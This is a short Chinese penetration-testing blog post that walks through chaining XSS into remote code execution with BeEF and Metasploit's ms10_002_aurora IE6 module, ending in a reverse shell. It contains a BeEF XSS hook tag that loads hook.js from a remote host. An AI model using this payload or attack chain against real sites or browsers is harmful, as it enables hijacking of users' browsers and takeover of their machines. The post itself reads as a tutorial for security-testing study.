一次xss到rce

Web安全渗透测试
19年3月18日

laolisafe

本次beef结合msf 完成整个攻击过程
启动beef
beef

xss代码（beef生成）：
<
sCRiPt> sRC=http://172.16.3.36:3000/hook.js>
本地演示：

xss执行

配置msf
payload
ms10_002_aurora （ie6 极光漏洞）
配置：

开始监听：

手动游览器执行：

（使用beef重定向到该url也可以）
上线：

反弹shell

给TA买糖

共{{data.count}}人

人已赞赏

Web安全渗透测试

年前的一次授权渗透测试

2019-2-14 8:35:08

Web安全渗透测试

某学校的一次漏洞挖掘

2019-3-22 9:00:43

1 条回复 A文章作者 M管理员

皮皮辞 Guest

19年3月18日

很多往事

更换删除

❯

解锁会员权限

个人中心

今日签到

有新私信私信列表

搜索

幸运之星正在降临...

点击领取今天的签到奖励！

恭喜！您今天获得了{{mission.data.mission.credit}}积分

今日签到

连续签到

{{item.credit}}

连续{{item.count}}天

查看所有

我的优惠劵

_￥_优惠劵

使用时效：无法使用

使用时效：
之前

使用时效：永久有效

优惠劵ID：
×

限制以下商品使用：限制以下商品分类使用：不限制使用：

[{{ct.name}}]

所有商品和商品类型均可使用

没有优惠劵可用!

购物车

×

删除

购物车空空如也!

清空购物车前往结算

您有新的私信

没有新私信

写新私信查看全部